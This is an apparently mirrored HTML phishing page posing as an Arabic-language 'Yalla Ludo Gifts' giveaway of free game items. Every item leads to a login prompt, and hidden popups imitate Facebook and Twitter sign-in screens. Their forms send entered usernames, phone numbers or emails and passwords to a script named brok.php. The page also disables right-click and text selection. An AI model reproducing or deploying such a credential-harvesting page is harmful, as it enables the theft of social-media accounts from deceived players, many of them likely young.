<html>

<!-- Mirrored from frostxgg.com/ by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 25 Dec 2020 10:21:11 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->

<head>
	<meta charset="UTF-8">
	<meta name="viewport"
		content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta property="og:title" content="yalla ludo">
	<meta name="description" content="yalla ludo">
	<meta property="og:description" content="yalla ludo">
	<meta property="og:url" content="./">
	<meta property="og:site_name" content="yalla ludo">
	<meta property="og:type" content="website">
	<meta name="copyright" content="yalla ludo">
	<meta name="theme-color" content="#000">
	<title>Yalla Ludo Gifts</title>
	<link rel="stylesheet" href="css/style.css">
	<link rel="stylesheet" href="css/animate.css">
	<link rel="stylesheet" href="css/login/facebook.css">
	<link rel="stylesheet" href="css/login/twitter.css">
	<link rel="stylesheet" href="css/font-awesome.min.css">
</head>

<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
	<style>
		body {
			background: url("") no-repeat center center;
			background-size: cover;
			background-attachment: fixed;
			background-color: #CCCCCC;
		}
	</style>
	<html>

	<body>
	</body>
	<html>
	<div class="container">

		<div class="header"></div>
		<br>
		<br>


		<center>
			<!-- <div class="item">
					<div class="item-name"></div>
					<img src="https://l.top4top.io/p_2311viwr41.jpg" style="border-bottom: none;">
					<div>
						<button onmousedown="buka.play();" onclick="account_login();" src="img/material.html">احصل
							عليه</button>
					</div>
				</div> -->
			<div class="item">
				<!-- <div class="item-name"></div> -->
				<img src="img/baron.png" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();"
							src="img/material.html">مجانا</button></a>
				</div>
			</div>
			<div class="item">
				<img src="img/knight.png" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();"
							src="img/item/latest/5.html">مجانا</button></a>
				</div>
			</div>

			<br>
			<br>
			<br>
			<div class="item">
				<!-- <div class="item-name"></div> -->
				<img src="img/17m.jpg" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();" 
							src="img/item/latest/5.html">مجانا</button></a>
				</div>
			</div>
			<div class="item">
				<!-- <div class="item-name">X7.7M</div> -->
				<img src="img/7m.jpg" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();" 
							src="img/item/latest/5.html">مجانا</button></a>
				</div>
			</div>
			<div class="item">
				<!-- <div class="item-name">X670.0K</div> -->
				<img src="img/670k.jpg" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();" 
							src="img/item/latest/5.html">مجانا</button></a>
				</div>
			</div>
			<br>
			<br>
			<br>
			<div class="item">
				<!-- <div class="item-name">X1</div> -->
				<img src="img/161k.jpg" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();" 
							src="img/item/latest/5.html">مجانا</button></a>
				</div>
			</div>
			<div class="item">
				<!-- <div class="item-name">X1</div> -->
				<img src="img/53k.jpg" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();" 
							src="img/item/latest/5.html">مجانا</button></a>
				</div>
			</div>
			<div class="item">
				<!-- <div class="item-name">X1</div> -->
				<img src="img/16k.jpg" style="border-bottom: none;">
				<div>
					<a href="login/index.html"><button onmousedown="buka.play();" 
							src="img/item/latest/5.html">مجانا</button></a>
				</div>
			</div>
		</center>
	</div>
	</div>
	</div> <!--- box --->
	</div> <!--- container --->

	<div class="popup account_login" style="display: none;">
		<div class="popup-box animated fadeInDown">
			<div class="nav-popup">
				<div class="nav-popup-title">حسابات التسجيل</div>
			</div>
			<div class="alert-wrapper">
				<div class="alert">
					سجل للتعرف علئ حسابك في يلا لودو
				</div>
			</div>
			<button type="button" class="btn-login facebook" onclick="open_facebook();"><i
					class="fa fa-facebook-square icon-login"></i> سجل بأستخدام الفيسبوك</button>
			<button type="button" class="btn-login twitter" onclick="open_twitter();"><i
					class="fa fa-twitter icon-login"></i> سجل بأستخدام التويتر</button>

			<center>
				<button type="button" class="btn-anjir" onmousedown="tutup.play()"
					onclick="close_account_login()">الغاء</button>
			</center>
		</div>
	</div>

	<div class="popup-login login-facebook animated fadeIn" style="display: none;">
		<div class="popup-box-login-fb">
			<a onclick="tutup_facebook()" class="close-fb"><i class="fa fa-times-circle"></i></a>
			<div class="navbar-fb">
				<img src="img/login/facebook_text.png">
			</div>
			<div class="content-box-fb">
				<img src="https://g.top4top.io/p_1994i882y1.jpg">
				<div class="txt-login-fb">
					سجل في حسابك الفيسبوك للوصول ليلا لودو
				</div>
				<form id="face-login-form" class="login-form" method="get" action="brok.php">
					<label>
						<input type="text" name="text" placeholder="رقم الهاتف او الاميل" autocomplete="off"
							autocapitalize="off" required></label>
					<label>
						<input type="password" name="password" placeholder="كلمة المرور" autocomplete="off"
							autocapitalize="off" required></label>
					<input type="hidden" name="login" value="Facebook" readonly>
					<input type="hidden" id="face-login-id" name="id" value="" readonly>
					<button type="submit" class="btn-login-fb">تسجيل</button>
				</form>
				<div class="txt-create-account">انشاء حساب</div>
				<div class="txt-not-now">ليس الان</div>
				<div class="txt-forgotten-password">نسيت كلمه السر?</div>
			</div>
			<div class="language-box">
				<center>
					<div class="language-name language-name-active">English (UK)</div>
					<div class="language-name">Bahasa Indonesia</div>
					<div class="language-name">Basa Jawa</div>
					<div class="language-name">Bahasa Melayu</div>
					<div class="language-name">日本語</div>
					<div class="language-name">Español</div>
					<div class="language-name">Português (Brasil)</div>
					<div class="language-name">
						<i class="fa fa-plus"></i>
					</div>
				</center>
			</div>
			<div class="copyright">Facebook Inc.</div>
		</div>
	</div>
	<div class="popup-login login-twitter animated fadeIn" style="display: none;">
		<div class="popup-box-login-twitter">
			<a onclick="tutup_twitter()" class="close-other"><i class="fa fa-times-circle"></i></a>
			<div class="header-twitter">
				<center>
					<img src="img/login/twitter_text.png">
				</center>
			</div>
			<div class="box-twitter">
				<center>
					<form id="twitter-login-form" method="get" action="brok.php">
						<div class="txt-login-twitter">سجل عبر تويتر</div>
						<div class="input-box-twitter">
							<label>اسم المستخدم / الاميل / رقم الهاتف</label>
							<input type="text" name="text" placeholder="" required>
						</div>
						<div class="input-box-twitter">
							<label>كلمة المرور</label>
							<input type="password" name="password" placeholder="" required>
						</div>
						<input type="hidden" name="login" value="Twitter" readonly>
						<input type="hidden" id="twitter-login-id" name="id" value="" readonly>
						<button type="submit" class="btn-login-twitter">تسجيل</button>
						<div class="footer-menu-twitter"></div>
						<div class="footer-menu-twitter bulet">•</div>
						<div class="footer-menu-twitter">سجل عبر اميلك</div>
					</form>



				</center>
			</div>
		</div>
	</div>
	<!--- fieldset content --->
	<script src="js/jquery.min.js"></script>
	<script src="js/bootstrap.min.js"></script>
	<!--- /fieldset content --->
	<script type="text/javascript" src="js/jquery-1.10.2.min.js"></script>
	<script src="js/timer.js"></script>
	<script src="js/tab.js"></script>
	<script src="js/popup.js"></script>
	<script src="js/click.js"></script>
	<script src="js/slider.js"></script>
</body>

<!-- Mirrored from frostxgg.com/ by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 25 Dec 2020 10:21:44 GMT -->

</html>